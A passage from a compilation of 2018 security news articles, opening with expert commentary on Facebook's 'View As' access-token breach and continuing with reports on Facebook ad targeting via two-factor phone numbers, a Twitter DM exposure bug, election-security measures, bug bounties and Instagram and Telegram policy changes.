“What the hackers accessed is interesting to me– information about the accounts having to do with user data rather than financial. This really underscores the new value currency of privacy and personally identifiable information, which includes demographics like gender, hometown, name, age (birthdate) and anything else a person has under their ‘About’ tab. After the misuse of personal information by Cambridge Analytica, one starts to speculate that the same information is being harvested for similar militant bot and troll activity online, especially heading toward elections and other significant activities. Sometimes why hackers go in and what is taken can give clues as to who the hackers might be – in this case, I can speculate at a probable nation state or other political group data harvesting operation.

How it was detected is also interesting – user logins increased dramatically last December. Companies looking to assemble evidence of attack or compromise can look at user behavior and traffic patterns changing as evidence of ‘something different’ that requires investigation. The OWASP Top 10 Risks for Web Application Security Risks was updated a month before the traffic pattern was noticed last December 2017, adding a new item: A10 Insufficient Logging and Monitoring. This attack and the length of time it went undetected and verified represents the truth of that rating and inclusion as a major risk.”

Rahul Kashyap, CEO, Awake Security:

“The immediate challenge for Facebook is going to be identifying what accounts were touched, compared to which ones were truly compromised. The 50 million number could change as we often have seen with past breaches. But it is quite likely a subset of those were specifically taken over.

What will be revealing is whether there is a pattern to whose accounts were being targeted, and whether that pattern will help reveal the identity of the attackers. Facebook knows what it knows now, but it there’s always the possibility that attackers were able to get to more information. The large numbers in this breach could just be a decoy if threat actors were targeting specific individuals.”

Eric Sheridan, chief scientist, WhiteHat Security:

“One of the best proactive strategies in reducing the risk of introducing vulnerabilities in applications is the enumeration and systemic adoption of ‘secure design patterns.’ While they may be unique to each organization and perhaps each application, secure design patterns help solidify those code level patterns that developers must adhere to in order to ward off the introduction of exploitable vulnerabilities.

Facebook looks to have been exploited as a result of a Direct Object Reference, whereby an attacker could modify an ‘id’ parameter in order to access unauthorized user information. In this case, a secure design pattern dictating the use of a façade known to enforce data layer security constraints could be adopted to mitigate such vulnerabilities. The adoption of a secure design pattern is not enough, however. We need automation to help enforce the use of the secure design pattern at scale, which presents its own set of challenges.”

Dan Pitman, Principal Security Architect, Alert Logic:

“New features increase the risk that vulnerabilities like this can become part of the live application and Facebook are known to implement new features at a high rate, having been acknowledged as the leader in agile web development practices in the past.

This 'continuous delivery' of new features combined with the modular nature of that delivery increases risk that vulnerabilities like this can become part of the live application. Testing all of the myriad combinations of the sometimes hundreds of components, or modules, that can interact is the challenge. The applications are made up of components built by different developers at different times working based on older best practices, all of this means that vulnerabilities are an inevitability. In Facebook’s case there will be people working hard to identify flaws in both trenches and this time the attackers got there first.”

Matthew Maglieri, CISO, Ashley Madison:

“These types of incidents serve as a reminder that no organization is immune to cyber threats. Facebook is at the forefront of web application security and have an incredibly talented team dedicated to protecting the security and privacy of their users.

As a professional who has worked with companies around the world to enhance and build their cybersecurity programs, I would say that we need to learn from incidents like these and not rush to judge companies like Facebook.

And while we must hold each other accountable for these incidents, we also need to help each other up, to avoid belittling our peers who have gone through the worst, and to share what we know so that others can improve. If we don’t, we’ll only be preventing the open and honest dialogue necessary for our collective success.”

Pravin Kothari, CEO, CipherCloud:

“The real $50 million dollar question is who did this impact, exactly? Do any of those 50 million customers impacted reside in the European Community? If so, will this fall under GDPR and how will it be treated? Enforcement of GDPR will come from the Information Commissioner’s Office (ICO). What will their reaction be? Given the horrendous publicity from the Cambridge Analytica data exposures, the EU reaction is not easily predicted. Not knowing all of the detail of when the breach was discovered, who, exactly was impacted, who was responsible, etc., the possible outcomes may be worse than we know today. We’ll have to see what Facebook discloses about potential liability if any exists. The calculations of the potential fines under GDPR are a bit mind-boggling with any possible impact to millions of users.”

Dr. Richard Ford, Chief Scientist, Forcepoint:

“First, I think it’s great that Facebook appears to have reacted so quickly, as it’s a sign of the growing maturity around breach response that we’re starting to see as GDPR comes into effect. Understanding if there was a pattern to the impacted accounts versus just random selection is the difference between someone trying to hack the system for fun or a coordinated nation-state attack that compromises specific users to ultimately gain access to sensitive data.

This breach illustrates a fundamental truth of the new digital economy: when I share my personal data with a company I am putting my trust in your ability to protect that data adequately. Users need to continually evaluate the type of data they share and the potential impact a breach of that data could cause, to become an active participant in protecting their own online identities. On the other side, companies need to avail themselves of proactive technologies such as behavioral analysis to hold up their end of the bargain.”

Greg Foss, senior manager of Threat Research, LogRhythm:

“The view-as feature within Facebook’s platform, while well-intentioned, is difficult to implement programmatically, in that you are viewing your account as another individual – essentially a light version of account impersonation. When implemented properly, you’re given a specific view of an account based on what is programmatically known about the account you’re viewing from.

Based on information available, a video uploading feature implemented in July of last year exposed this feature to a flaw that allowed attackers to impersonate other user accounts and effectively obtain full access to their Facebook profiles. It appears that attackers are able to access the accounts of ‘friends’ or those already connected to the compromised account.

If that’s true, it may be possible to trace the attacks back to a single point of origin, given the nature of how the attack spreads to other accounts. That said, the origin account will most likely not be that of a real Facebook user, so determining an individual or group behind this will take some digging.”

Chester Wisniewski, Principal Research Scientist, Sophos:

“In something as big and complicated as Facebook, there are bound to be bugs. The theft of these authorization tokens is certainly a problem, but not nearly as big of a risk to user's privacy as other data breaches we have heard about or even Cambridge Analytica for that matter.

As with any social media platform, users should assume their information may be made public, through hacking or simply through accidental oversharing. This is why sensitive information should never be shared through these platforms. For now, logging out and back in is all that is necessary. The truly concerned should use this as a reminder and an opportunity to review all of their security and privacy settings on Facebook and all other social media platforms they share personal information with.”

Adam Levin, Founder, CyberScout:

“Facebook has had a hard year, and it just got worse. In a world dominated by trillion-dollar advertising platforms consisting of multi-billion member communities, 50 million users may no longer seem like a big deal, but it is. The number of people affected by this breach is roughly equal to the entire population of the west coast of the United States. Just because you are secure at 9:01 does not mean that will still be the case at 9:02. The latest Facebook breach was caused by an upgrade. The takeaway is simple: Any changes made to networks, software and other systems must be immediately and continually tested and monitored for vulnerabilities that may have been caused in the process. The traditional "patch and pray" approach to cybersecurity is obsolete. An effective vulnerability management program is crucial.”

Satya Gupta, chief technology officer and co-founder of Virsec:

“While the “View As” feature sounds like a useful way to see what your profile looks like to your ex-girlfriend, it was clearly built without thinking through security. Instead of just seeing through someone else’s eyes, Facebook essentially lets you borrow their identity. Armed with someone else’s access token you can get to lots of private and highly privileged information. In addition, millions of people use their Facebook ID (authenticated through their access tokens) to connect to other services where they might be storing files, making purchases, or doing other things that they thought were private. Facebook claims to not know what these 50 million access tokens are being used for, you can bet that the thieves have found them to be very valuable.

These problems could easily have been avoided and services that prioritize security, like banks, hospitals and even airlines rarely make these basic mistakes. It’s a bad idea to let users stay logged on indefinitely while there is no activity. Many people will open a Facebook browser tab and not close it for hours or days while doing other things. If you’re logged into your banking site and are inactive for more than a few minutes you are automatically logged off and need to re-authenticate. This is a small burden for users and a no-brainer for security. There are also solutions that provide continuous authentication requiring users to confirm their identity if there is any unusual behavior.”

Dawn Song, CEO, Oasis Labs:

“Today’s breach confirms a critical trend--it's nearly impossible for major tech companies to protect data with existing technologies. It's time to start looking at new solutions like blockchain to defend user privacy.”


Several Bugs Exploited in Massive Facebook Hack
1.10.2018 securityaffairs
Social  Vulnerebility

Facebook Shares More Details on Hack Affecting 50 Million Accounts

Facebook Shares More Details About Hack Affecting 50 Million Accounts

Facebook has shared additional details about the hacker attack affecting 50 million accounts, including technical information and what its investigation has uncovered so far.

The social media giant announced on Friday that malicious actors exploited a vulnerability related to the “View As” feature to steal access tokens that could have been leveraged to hijack accounts. The tokens of nearly 50 million users have been compromised.

The tokens of these users have been reset to prevent abuse, along with the tokens of 40 million others who may be at risk due to the fact that they were subject to a View As lookup in the past year – impacted users will need to log back in to their accounts. The problematic feature has been suspended until a security review is conducted.

Technical details on Facebook hack

The “View As” feature shows users how others see their profile. This is a privacy feature designed to help users ensure that they only share information and content with the intended audience.

The vulnerability that exposed access tokens involved a combination of three distinct bugs affecting the “View As” feature and a version of Facebook’s video uploader interface introduced in July 2017.

When “View As” is used, the profile should be displayed as a read-only interface. However, the text box that allows people to wish happy birthday to their friends erroneously allowed users to post a video – this was the first bug.

When posting a video in the affected box, the video uploader generated an access token that had the permissions of the Facebook mobile app – this was the second bug as the video uploader should not have generated a token at this point.

The third and final problem was that the generated token was not for the user who had been using “View As” but for the individual whose profile was being looked up.

Hackers could obtain the token from the page’s HTML code, and use it access the targeted user’s account. An attacker would first have to target one of their friends’ account and move from there to other accounts. The attack did not require any user interaction.

“The attackers were then able to pivot from that access token to other accounts, performing the same actions and obtaining further access tokens,” explained Pedro Canahuati, VP of Engineering, Security and Privacy at Facebook.

Users and information affected by the breach

Facebook says the vulnerability has been patched. The social media giant claims that while the attackers did try to query its APIs to access profile information – such as name, gender and hometown – there is no evidence that any private information was actually accessed.

Facebook’s investigation continues, but the company says it has found no evidence that the attackers accessed private messages or credit card information.

Facebook says impacted users are from all around the world – it does not appear that the attack was aimed at a specific country or region. It’s worth noting that Facebook founder and CEO, Mark Zuckerberg, and Sheryl Sandberg, the company’s COO, were among those affected.

Another noteworthy issue is that the exposed tokens can be used not only to access Facebook accounts, but also third-party apps that use Facebook login. However, the risk should be eliminated now that the existing tokens have been reset.

Users who have linked Facebook to an Instagram account will need to unlink and relink their accounts due to the tokens being reset. Facebook clarified that WhatsApp is not impacted.

Facebook is alerting users whose tokens have been compromised by sending notifications to their accounts. In some cases, users can check if their accounts were actually hacked by accessing the “Security and Login” page from the Settings menu. However, access is only logged if the attacker created a full web session.

Incident timeline and information on attackers

Facebook discovered the breach following an investigation that started on September 16, after noticing a traffic spike, specifically increased user access to the website. However, it only realized that it was dealing with an attack on September 25, when it also identified the vulnerability. Affected users were notified and had their access tokens reset beginning with Thursday, September 27.

As for the attackers, no information has been shared, but the social media firm did note that exploitation of the vulnerability is complex and it did require a certain skill level.

The company says it has notified the FBI and law enforcement. While the company has responded quickly after the breach was discovered, MarketWatch reports that the Data Protection Commission in Ireland, Facebook's main privacy regulator in Europe, could fine the company as much as $1.64 billion under the recently introduced GDPR.

U.S. Senator Mark R. Warner responded to news of the Facebook hack, asking for a full investigation.

“Today’s disclosure is a reminder about the dangers posed when a small number of companies like Facebook or the credit bureau Equifax are able to accumulate so much personal data about individual Americans without adequate security measures,” Sen. Warner said. “This is another sobering indicator that Congress needs to step up and take action to protect the privacy and security of social media users. As I’ve said before – the era of the Wild West in social media is over.”

FTC Commissioner Rohit Chopra wrote on Twitter that he wants answers.

Despite no evidence of harm to any user, a class action lawsuit has already been filed against Facebook in the United States.

Facebook stock fell 3 percent after the breach was disclosed.


Facebook: User shadow data, including phone numbers may be used by advertisers
29.9.2018 securityaffairs
Social

The worst suspect is a disconcerting reality, Facebook admitted that advertisers were able to access phone numbers of its users for enhanced security.
Researchers from two American universities discovered that that phone numbers given to Facebook for two-factor authentication were also used for advertising purposes.

“These findings hold despite all the relevant privacy controls on our test accounts being set to their most private settings,” reads the study published by the researchers.

“Most worrisome, we found that phone numbers uploaded as part of syncing contacts — that were never owned by a user and never listed on their account – were in fact used to enable PII-based advertising,”

The study investigates the channels used by advertisers can gather personally identifying information (PII) from Facebook, WhatsApp and Messenger services.

The contact lists uploaded to the Facebook platforms could be used by advertisers that once extracted the personal information can leverage it to target people in their networks.

The experts speculate Facebook is using a hidden layer of details it has about its users, like phone numbers used for 2FA authentication, that they called “shadow contact information.”

The study supported concerns that Facebook uses “shadow” sources of data not given to the social network for the purpose of sharing to make money on advertising.

“We use the information people provide to offer a better, more personalized experience on Facebook, including showing more relevant ads.” a spokeswoman told Gizmodo that first reported the news.

Facebook continues to face a severe crisis due to the way it manages data of its users, the Cambridge Analytica case has shocked the world about the way the social network giant has shared the information of its unaware users with third party companies.

At the time of writing, Facebook’s Guy Rosen, VP of Product Management announced that attackers exploited a vulnerability in the “View As” feature to steal Facebook access tokens of 50 Million Users.


Facebook hacked – 50 Million Users’ Data exposed in the security breach
29.9.2018 securityaffairs
Social

Facebook hacked – Attackers exploited a vulnerability in the “View As” feature that allowed them to steal Facebook access tokens of 50 Million Users.
Facebook hacked, this is news that is rapidly spreading across the Internet. A few hours ago, Facebook announced that an attack on its computer network exposed the personal information of roughly 50 million users.

The giant of social networks has discovered the security breach this week, the attackers have exploited a bug in the “View as” features to steal access tokens of the users and take over their accounts.

Facebook has identified the flaw exploited in the attack and already fixed it, it immediately launched an investigation and reported the incident to law enforcement.

In a blog post, Facebook’s Guy Rosen, VP of Product Management explained that the attackers exploited a vulnerability associated with Facebook’s “View As” feature that allowed them to steal Facebook access tokens. These tokens could then be used to take over people’s accounts.

“On the afternoon of Tuesday, September 25, our engineering team discovered a security issue affecting almost 50 million accounts.” stated Guy Rosen, Facebook VP of Product Management.

“Our investigation is still in its early stages. But it’s clear that attackers exploited a vulnerability in Facebook’s code that impacted “View As”, a feature that lets people see what their own profile looks like to someone else. This allowed them to steal Facebook access tokens which they could then use to take over people’s accounts.”

Facebook disabled the “View As” feature in response to the incident, the company reset the security tokens for the 50 million impacted accounts, and as a precautionary measure, reset them for other 40 million accounts.

“Second, we have reset the access tokens of the almost 50 million accounts we know were affected to protect their security. We’re also taking the precautionary step of resetting access tokens for another 40 million accounts that have been subject to a “View As” look-up in the last year. As a result, around 90 million people will now have to log back in to Facebook, or any of their apps that use Facebook Login. After they have logged back in, people will get a notification at the top of their News Feed explaining what happened.” continues Guy Rosen.

“Third, we’re temporarily turning off the “View As” feature while we conduct a thorough security review.”

Facebook revealed that the bug exploited by the attackers was introduced with a change to their video uploading feature made in July 2017.

The tech giant said it did not know the source of the attack or identity of the attackers.

“We’re taking it really seriously,” Mark Zuckerberg, the company’s chief executive, said in a conference call with reporters. “We have a major security effort at the company that hardens all of our surfaces.” He added: “I’m glad we found this. But it definitely is an issue that this happened in the first place.”

The company will provide more information once the investigation will be completed.


Facebook Admits Phone Numbers May be Used to Target Ads
28.9.2018 securityweek
Social

Facebook on Thursday confirmed that advertisers were privy to phone numbers given by members of the social network for enhanced security.

A study by two US universities, first reported by news website Gizmodo, found that phone numbers given to Facebook for two-factor authentication were also used to target advertising.

Two-factor authentication is intended to enhance security by requiring a second step, such as entering codes sent via text messages, as well as passwords to get into accounts.

Phone numbers added to profiles, for security purposes, or for messaging were potential fodder for advertisers, according to the study.

"These findings hold despite all the relevant privacy controls on our test accounts being set to their most private settings," researchers said in the study, which looked at ways advertisers can get personally identifying information (PII) from Facebook or its WhatsApp and Messenger services.

Contact lists uploaded to Facebook platforms could be mined for personal information, meaning that people could unintentionally help advertisers target their friends.

"Most worrisome, we found that phone numbers uploaded as part of syncing contacts -- that were never owned by a user and never listed on their account - were in fact used to enable PII-based advertising," researchers said in the study.

The study supported concerns that Facebook uses "shadow" sources of data not given to the social network for the purpose of sharing to make money on advertising.

"We use the information people provide to offer a better, more personalized experience on Facebook, including ads," a spokeswoman said in response to an AFP inquiry about the study findings.

"We are clear about how we use the information we collect, including the contact information that people upload or add to their own accounts."

Facebook is grappling with the worst crisis in its history, vilified for not more zealously guarding the information that users share.

The Silicon Valley-based internet colossus faced intense global scrutiny over the mass harvesting of personal data by Cambridge Analytica, a British political consultancy that worked for Donald Trump's 2016 election campaign.

The company has admitted up to 87 million users may have had their data hijacked in the scandal.


Bug Exposed Direct Messages of Millions of Twitter Users
24.9.2018 securityweek
Social

Millions of Twitter Users Affected by Information Exposure Flaw

Twitter has patched a bug that may have caused direct messages to be sent to third-party developers other than the ones users interacted with. The problem existed for well over a year and it impacted millions of users.

According to Twitter, the issue is related to the Account Activity API (AAAPI), which allows developers registered on the social network’s developer program to build tools designed to better support businesses and their customer communications on the platform.

Users who between May 2017 and September 10, 2018, interacted with an account or business on Twitter that relied on a developer using the AAAPI may have had their messages sent to a different registered developer.Information Exposure Vulnerability Affected Millions of Twitter Users

“In some cases this may have included certain Direct Messages or protected Tweets, for example a Direct Message with an airline that had authorized an AAAPI developer. Similarly, if your business authorized a developer using the AAAPI to access your account, the bug may have impacted your activity data in error,” Twitter said.

Twitter determined that less than 1% of users are impacted, but that still represents roughly 3 million accounts – Twitter reported having 335 million active users in the second quarter of 2018. Affected users are being notified by the company, which has also reached out to developers who may have received messages in error to ensure that the information is deleted.

While this may seem like a serious issue, Twitter claims that a specific set of technical circumstances are required to trigger the bug. This includes two or more registered developers having AAAPI subscriptions for domains on the same public IP, matching URL paths (e.g. example.com/[webhooks/twitter] andanotherexample.com/[webhooks/twitter), activity from both devs within the same 6-minute timeframe, and subscriber activity originating from the same Twitter backend server.

“Our team has been working diligently with our most active enterprise data customers and partners who have access to this API to evaluate if they were impacted. Through our work so far, and the information made available to us by our partners, we can confirm that the bug did not affect any of the partners or customers with whom we have completed our review,” Twitter said on Friday.


Facebook Boosts Protections for Political Candidates
22.9.2018 securityweek
Social

Facebook this week revealed new tools that are aimed to defend users associated with US political campaigns ahead of the 2018 midterm elections.

The social platform, which has taken various steps towards protecting elections from abuse and exploitation on its platform, including the takedown of fake pages and accounts involved in political influence campaigns, is now launching new tools to defend candidates and campaign staff.

Both hackers and foreign adversaries might be particularly interested in targeting Facebook users who are associated with political campaigns, Facebook says.

The social network already has in place a series of security tools and procedures to stay ahead of bad actors who attempt to use Facebook to disrupt elections, and a newly announced pilot program is meant to complement those.

The new pilot program is open for candidates for federal or statewide office, as well as for staff members and representatives from federal and state political party committees, Facebook announced. The additional security protections can be added both to Pages and to accounts.

To apply for the program, Page admins should head to politics.fb.com/campaignsecurity. Once enrolled, they will be able to add others from their campaign or committee.

“We’ll help officials adopt our strongest account security protections, like two-factor authentication, and monitor for potential hacking threats,” Facebook says.

The program, the social platform claims, can help it detect any targeting that does happen, while also allowing candidates to quickly report such abuses. Once an attack against one campaign official has been detected, the platform can review and protect other enrolled accounts that are affiliated with that same campaign.

Facebook also says it shares relevant information with law enforcement and other companies to increase effectiveness. Additionally, the social network is assessing how the pilot program and other security tools “might be expanded to future elections and other users, such as government officials.”

“Although this is a pilot program, it’s one of several steps we’re taking ahead of the US midterm elections to better secure Facebook, including detecting and removing fake accounts, working to prevent the spread of false news, and setting a new standard for political and issue ads transparency,” the platform concludes.


Facebook Building a 'War Room' to Battle Election Meddling
22.9.2018 securityweek
Social

Facebook on Wednesday said it will have a "war room" up and running on its Silicon Valley campus to quickly repel efforts to use the social network to meddle in upcoming elections.

"We are setting up a war room in Menlo Park for the Brazil and US elections," Facebook elections and civic engagement director Samidh Chakrabarti said during a conference call.

"It is going to serve as a command center so we can make real-time decisions as needed."

He declined to say when the "war room" -- currently a conference room with a paper sign taped to the door -- would be in operation.

Teams at Facebook have been honing responses to potential scenarios such as floods of bogus news or campaigns to trick people into falsely thinking they can cast ballots by text message, according to executives.

"Preventing election interference on Facebook has been one of the biggest cross-team efforts the company has seen," Chakrabarti said.

The conference call was the latest briefing by Facebook regarding efforts to prevent the kinds of voter manipulation or outright deception that took place ahead of the 2016 election the brought US President Donald Trump to office.

Facebook is better prepared to defend against efforts to manipulate the platform to influence elections and has recently thwarted foreign influence campaigns targeting several countries, chief executive Mark Zuckerberg said last week in a post on the social network.

"We've identified and removed fake accounts ahead of elections in France, Germany, Alabama, Mexico and Brazil," Zuckerberg said.

- 'Better prepared' for attacks -

"We've found and taken down foreign influence campaigns from Russia and Iran attempting to interfere in the US, UK, Middle East, and elsewhere -- as well as groups in Mexico and Brazil that have been active in their own country."

Zuckerberg repeated his admission that Facebook was ill-prepared for the vast influence efforts on social media in the 2016 US election but added that "today, Facebook is better prepared for these kinds of attacks."

Facebook has started showing who is behind election-related online ads, and have shut down accounts involved in coordinated stealth influence campaigns.

With the help of artificial intelligence software, Facebook blocked nearly 1.3 billion fake accounts between March and October of last year, according to Chakrabarti.

"We are working hard to amplify the good and mitigate the bad," news feed director Greg Marra said on the call.

As elections near, Facebook will also encourage civic involvement and voter registration, according to global politics and government outreach director Katie Harbath.

Facebook has partnered with non-profit organizations to bolster election integrity efforts outside the US and has been meeting with other technology companies to coordinate sharing information about election meddling efforts spanning social media platforms, according to Harbath.

Facebook said it has also started working with political campaigns to improve staff online security practices, such as requiring more than just a password to access an account.


Facebook Offers Rewards for Access Token Exposure Flaws
18.9.2018 securityweek
Social

Facebook announced on Monday that it has expanded its bug bounty program to introduce rewards for reports describing vulnerabilities that involve the exposure of user access tokens.

Access tokens allow users to log into third-party applications and websites through Facebook. The tokens are unique for each user and each app, and users can choose what information can be accessed by the token and the app using it, as well as what actions it can take. The problem is that if a token is exposed, it can be misused to an extent that depends on the permissions set by its owner.

Facebook has updated its bug bounty program to clarify what it expects from reports describing token-related vulnerabilities.

In order to qualify for a bug bounty – Facebook is offering a minimum of $500 per vulnerability – researchers have to submit a clear proof-of-concept (PoC) demonstrating a flaw that allows access to or misuse of tokens.

One very important condition, according to the company, is that the bug needs to be discovered by passively viewing data sent to or from a device while the affected application is in use.

“You are not permitted to manipulate any request sent to the app or website from your device, or otherwise interfere with the ordinary functioning of the app or website in connection with submitting your report. For example, SQLi, XSS, open redirect, or permission-bypass vulnerabilities (such as IDOR) are strictly out of scope,” explained Dan Gurfinkel, Security Engineering Manager at Facebook.

The social media giant will inform the developer of the impacted app or website and work with them to address the issue. Apps that fail to promptly comply will be suspended from the platform until the problem has been resolved and a security review is conducted. Facebook says it will also automatically revoke tokens that may have been compromised.

Facebook has taken significant steps to improve security and privacy following the Cambridge Analytica scandal, in which the personal details of a significant number of users were harvested. The company announced in March that it had made a series of changes to its developer platform to implement tighter user privacy controls and limit how apps can access user data. It later announced rewards for users who report misuse of private information.

According to Facebook, in 2017 it paid out $880,000 in bug bounties, with a total of over $6.3 million since the launch of its program in 2011.


Facebook Chief Says Internet Firms in 'Arms Race' for Democracy
5.9.2018 securityweek 
Social

Facebook chief Mark Zuckerberg said late Tuesday that the leading social network and other internet firms are in an arms race to defend democracy.

Zuckerberg's Washington Post op-ed came on the eve of hearings during which lawmakers are expected to grill top executives from Facebook and Twitter.

Google's potential participation is unclear.

The hearings come with online firms facing intense scrutiny for allowing the propagation of misinformation and hate speech, and amid allegations of political bias from the president and his allies.

"Companies such as Facebook face sophisticated, well-funded adversaries who are getting smarter over time, too," Zuckerberg said in an op-ed piece outlining progress being made on the front by the leading social network.

"It's an arms race, and it will take the combined forces of the US private and public sectors to protect America's democracy from outside interference."

After days of vitriol from President Donald Trump, big Silicon Valley firms face lawmakers with a chance to burnish their image -- or face a fresh bashing.

Twitter chief executive Jack Dorsey and Facebook chief operating officer Sheryl Sandberg were set to appear at a Senate Intelligence Committee hearing on Wednesday.

Lawmakers were seeking a top executive from Google or its parent Alphabet, but it remained unclear if the search giant would be represented.

Sources familiar with the matter said Google offered chief legal officer Kent Walker, who the company said is most knowledgeable on foreign interference, but that senators had asked for the participation of CEO Sundar Pichai or Alphabet CEO Larry Page.

Dorsey testifies later in the day at a hearing of the House Energy and Commerce Committee on online "transparency and accountability."

The tech giants are likely to face a cool reception at best from members of Congress, said Roslyn Layton, an American Enterprise Institute visiting scholar specializing in telecom and internet issues.

"The Democrats are upset about the spread of misinformation in the 2016 election, and the Republicans over the perception of bias," Layton said.

"They are equally angry, but for different reasons."

Kathleen Hall Jamieson, a University of Pennsylvania professor and author of an upcoming book on Russia's role in election hacking, said the hearings could give the companies a platform to explain how they operate.

"Hearings are an opportunity as well as a liability," she said.

"These companies have put in place fixes (on foreign manipulation) but they have done it incrementally, and they have not communicated that to a national audience."


Twitter to Verify Those Behind Hot-button US Issue Ads
4.9.2018 securityweek 
Social

Twitter on Thursday started requiring those behind hot-button issue ads in the US to be vetted as part of the effort by the social network to thwart stealth campaigns aimed at influencing politics.

The tightened ad policy included requiring photos and valid contact information, and prohibited state-owned media or national authorities from buying political ads to be shown on Twitter outside their home countries.

Those placing these Twitter ads will need to be "certified" by the company and meet certain guidelines, and the ads will be labeled as political "issue" messages.

"The intention of this policy is to provide the public with greater transparency into ads that seek to influence people's stance on issues that may influence election outcomes," Twitter executives Del Harvey and Bruce Falck said in a blog post.

The new ad policy came as major technology firms including Facebook, Google and Twitter battle against misinformation campaigns by foreign agents.

Facebook, Twitter, Google and Microsoft recently blocked accounts from Russian and Iranian entities which the companies said were propagating misinformation aimed at disrupting the November US elections.

The new ad policy at Twitter applies to paid messages that identify political candidates or advocate regarding legislative issues of national importance.

Examples of issue topics provided by Twitter included abortion, civil rights, climate change, guns, healthcare, immigration, national security, social security, taxes and trade.

The policy did not apply to news agencies reporting on candidates or issues, rather than advocating outcomes, according to Harvey and Falck.

Silicon Valley executives are set to take part in a September 5 Senate hearing about foreign efforts to use social media platforms to influence elections.


Instagram Introduces New Account Safety Features
30.8.2018 securityweek
Social

Instagram this week announced new features to boost account security and provide users with increased visibility into accounts with a large number of followers.

Instagram will soon provide users with the ability to evaluate the authenticity of an account that reaches large audiences. The information will be accessible through an “About This Account” option in the Profile menu, Mike Krieger, Co-Founder & CTO, explains in a blog post.

Information displayed will include the date the account joined Instagram, the country it is located in, accounts with shared followers, username changes in the last year, and details on the ads the account might be running.

The feature appears as a reaction to numerous misinformation campaigns that have been exposed over the past few months, some supposedly originating from Russia or Iran.

“Our community has told us that it’s important to them to have a deeper understanding of accounts that reach many people on Instagram, particularly when those accounts are sharing information related to current events, political or social causes, for example,” Krieger notes.

Starting next month, the social platform will allow people with accounts that reach large audiences to review the information about their accounts. Soon after, the “About This Account” feature will become available to the global community.

Additionally, Instagram is allowing accounts that reach large audiences and meet specific criteria to request verification through a form within the Instagram app. The social platform will review the requests “to confirm the authenticity, uniqueness, completeness and notability of each account,” Krieger says.

The verification request form is available by accessing the menu icon in the Profile section, selecting Settings, and then “Request Verification.” Users requesting verification will need to provide the account username, their full name, and a copy of their legal or business identification.

Instagram will review all requests but might decline verification for some accounts. The verification will be performed free of charge and users won’t be contacted to confirm verification.

Soon, the platform will also include support for third-party authenticator apps for those who choose to use such tools to log into their Instagram accounts.

To take advantage of the feature, users would need to access the profile section, tap the menu icon, go to “Settings,” and then select “Authentication App” in the “Two-Factor Authentication” section. If an authentication app is already installed, Instagram will automatically send a login code to it. Users will need to enter the code on Instagram to enable two-factor authentication.

According to Krieger, support for third-party authenticator apps is already rolling out to users and should reach all of them in the coming weeks.


Twitter Suspends Accounts Engaged in Manipulation
29.8.2018 securityweek
Social

Twitter this week announced the suspension of a total of 770 accounts for “engaging in coordinated manipulation.”

The suspensions were performed in two waves. One last week, when the social networking platform purged 284 accounts, many of which supposedly originated from Iran, and another this week, when 486 more accounts were kicked for the same reason.

“As with prior investigations, we are committed to engaging with other companies and relevant law enforcement entities. Our goal is to assist investigations into these activities and where possible, we will provide the public with transparency and context on our efforts,” Twitter noted last week.

The micro-blogging platform took action on the accounts after FireEye published a report detailing a large campaign conducted out of Iran focused on influencing the opinions of people in the United States and other countries around the world.

Active since at least 2017, the campaign focuses on anti-Israel, anti-Saudi, and pro-Palestine topics, but also included the distribution of stories regarding U.S. policies favorable to Iran, such as the Joint Comprehensive Plan of Action nuclear deal.

The report triggered reactions from large Internet companies, including Facebook and Google. The former removed 652 pages, groups, and accounts suspected of being tied to Russia and Iran, while the latter blocked 39 YouTube channels and disabled six Blogger and 13 Google+ accounts.

“Since our initial suspensions last Tuesday, we have continued our investigation, further building our understanding of these networks. In addition, we suspended an additional 486 accounts for violating the policies outlined last week. This brings the total suspended to 770,” Twitter said on Tuesday.

The social platform also revealed that fewer than 100 of the 770 suspended accounts claimed to be located in the United States, and many were sharing divisive social commentary. These accounts, however, had thousands of followers, on average.

“We identified one advertiser from the newly suspended set that ran $30 in ads in 2017. Those ads did not target the U.S. and the billing address was located outside of Iran. We remain engaged with law enforcement and our peer companies on this issue,” Twitter also said.

In June, Twitter announced a new process designed to improve the detection of spam accounts and bots and also revealed updates to its sign-up process to make it more difficult to register spam accounts. In early August, Duo Security announced a new tool capable of detecting large Twitter botnets.


Telegram Says to Cooperate in Terror Probes, Except in Russia
29.8.2018 securityweek
Social  BigBrothers

The Telegram encrypted messenger app said Tuesday said it would cooperate with investigators in terror probes when ordered by courts, except in Russia where it is locked in an ongoing battle with authorities.

The company founded by Russian Pavel Durov has refused to provide authorities in the country with a way to read its communications and was banned by a Moscow court in April as a result.

But in its updated privacy settings, Telegram said it would disclose its users' data to "the relevant authorities" elsewhere if it receives a court order to do so, although not in Russia.

"If Telegram receives a court order that confirms you're a terror suspect, we may disclose your IP address and phone number to the relevant authorities," Telegram's new privacy settings said.

"So far, this has never happened. When it does, we will include it in a semiannual transparency report," the app added.

Durov said the new privacy terms were adopted to "comply with new European laws on protecting private data."

But Durov assured his Russian users that Telegram would continue to withhold their data from security services.

"In Russia, Telegram is asked to disclose not the phone numbers or IP addresses of terrorists based on a court decision, but access to the messages of all users," he wrote on his Telegram channel.

He added that since Telegram is illegal in Russia, "we do not consider the request of Russian secret services and our confidentiality policy does not affect the situation in Russia."

Durov has long said he would reject any attempt by the country's security services to gain backdoor access to the app.

Telegram lets people exchange messages, stickers, photos and videos in groups of up to 5,000 people. It has attracted more than 200 million users since its launch by Durov and his brother Nikolai in 2013.

Russia has acted to curb internet freedoms as social media has become the main way to organise demonstrations.

Authorities stepped up the heat on popular websites after Vladimir Putin started his fourth Kremlin term in 2012, ostensibly to fight terrorism but analysts say the real motive was to muzzle Kremlin critics.

According to the independent rights group Agora, 43 people were given prison terms for internet posts in Russia in 2017.

Tech companies have had difficulty balancing the privacy of users against law enforcement, with encryption of communications adding a layer of complexity to cooperating with authorities.

One of Telegram's rival apps, Facebook-owned Whatsapp, says it complies with authorities in accordance with "applicable law".


Facebook Pulls Security App From Apple Store Over Privacy

28.8.2018 securityweek Social

Facebook has pulled one of its own products from Apple's app store because it didn't want to stop tracking what people were doing on their iPhones. Facebook also banned a quiz app from its social network for possible privacy intrusions on about 4 million users.

The twin developments come as Facebook is under intense scrutiny over privacy following the Cambridge Analytica scandal earlier this year. Allegations that the political consultancy used personal information harvested from 87 million Facebook accounts have dented Facebook's reputation.

Since the scandal broke, Facebook has investigated thousands of apps and suspended more than 400 of them over data-sharing concerns.

The social media company said late Wednesday that it took action against the myPersonality quiz app, saying that its creators refused an inspection. But even as Facebook did that, it found its own Onavo Protect security app at odds with Apple's tighter rules for applications.

